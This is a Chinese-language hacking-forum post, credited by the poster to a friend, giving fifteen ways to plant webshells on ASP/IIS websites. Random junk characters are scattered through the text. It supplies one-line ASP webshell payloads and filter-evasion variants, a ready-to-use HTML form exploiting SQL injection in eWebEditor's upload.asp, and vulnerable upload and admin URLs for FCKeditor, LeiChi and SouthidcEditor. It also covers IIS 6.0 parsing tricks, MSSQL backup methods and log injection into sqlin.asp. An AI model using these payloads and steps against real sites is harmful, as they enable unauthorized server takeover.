 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
8 U9 W0 }* v K: O. Y
8 c+ Y/ x2 g @6 d8 T2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
! J% V2 v& A, c1 W4 t9 D" A
: h. N* S5 |, w5 e5 H3.上传漏洞:( f) X- j0 M) B+ _- {/ `% o
6 R" D0 ], R5 o. H
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x000 J8 @; x) q' ?: q" s
1 f7 ?8 Y9 K U* B. h; A3 V' [
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件2 S/ T, \" f1 p' z: u
' Z9 [# U, H v* U, V1 ~
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
. ?% p9 s- b' |; Q! H- V然后在上传文件里面填要传的图片格式的ASP木马# g, \. m# r1 @" M4 t# J
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp% J5 D( `& @" i& b+ E$ f
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
( b7 R7 |3 o# e, O& z& \$ y L& E6 {9 v/ q ?0 c4 ~
<html>
# W0 Z/ j9 N6 m* J6 t' M<head>5 B: o7 f9 O: m
<title>ewebeditor upload.asp上传利用</title>* J6 j2 J5 R$ ~* J W& g: q: o( z
</head>
8 ?- o2 p; L# y3 G) ~<body>
2 x- |% f& M% I; |& ~& f<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
/ N/ A, p9 c& S3 r6 e4 z) e$ Y1 I<input type=file name=uploadfile size=100><br><br>3 d+ g+ d. w& G5 a( E9 ~
<input type=submit value=Fuck>
0 b2 Q( H$ G, L</form>
8 ^0 r3 F# B" J! `2 [2 ~</body>) J3 S9 d, y3 r% ?# y5 P
</form>2 _. Y ]0 h4 W4 T6 ]6 y
</html>
" M3 q2 U5 J2 @8 ] B! X! g/ R7 }- a& }" Q
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问* T/ Z1 p" S% @9 w: G
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
6 i% L/ P% r4 }9 Z0 ^+ ?
: o2 z# y# j2 I+ f4 _9 d利用windows2003解析。建立zjq.asp的文件夹- L" K1 A, D4 G) U! @6 k
' {- J7 k/ \3 m! I6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型; U2 |, t! W4 c! o7 V/ [
2 `0 W% s2 A! I% d. s) _7.cuteeditor:类似ewebeditor
% B7 U7 Z8 i% O7 l, T; u: Y4 ^
' {" e( ]: N' \6 o9 A. U8.htmleditor:同上
5 N& x/ F+ O; |2 C9 {4 c
% x) _9 a, A3 n9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
+ U2 Q3 }7 Y+ Q3 D
% R' U( J5 I- [' o" I$ ~7 T+ R# S<%execute request("value")%><%'<% loop <%:%>
& x! P9 {! x: C; v1 R& `7 s, b8 r1 Y+ F s& Z$ P4 b( L3 }8 r" y
<%'<% loop <%:%><%execute request("value")%>2 r; R7 m8 Q2 j0 C1 R- G
$ ^3 |% G8 I0 N" ?' l/ }2 R
<%execute request("value")'<% loop <%:%>7 _' [- Z- c) x
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞6 z4 H2 ]0 Z- }( X$ ?9 f
1 O9 o' E2 V% G# N3 n# u5 l9 |; x1 ]10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞9 w, |; h$ S: r) P& R; \* R9 ^
# h8 Z ]# H2 y9 H0 l
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3% V1 f" B. t1 P8 i+ R' p
5 O p8 v1 X/ O# I7 J解析漏洞得到webshell
) ?- ]' q: ~" v/ m$ r# K9 |
9 a( \: R% f7 L# E4 J12.mssql差异备份,日志备份,前提需知道web路径5 x/ u5 e/ {& n9 s7 s
6 _" M ~4 n! b# R' d% t13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell' Z0 K$ Q& \/ T4 {# g8 \ O
- g4 G! J$ ?! O1 f5 d1 A( J+ L14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell# `% n; Z# k6 i
! h3 V* n! i# k& p* {' q' w$ J1 h. b* T
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
4 S" A3 Z/ e9 v. \) _* w8 f; h9 y V8 R
以上只是本人的一些拙见,并不完善,以后想到了再继续添加
! w$ n0 m; ?/ Y$ r# T不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|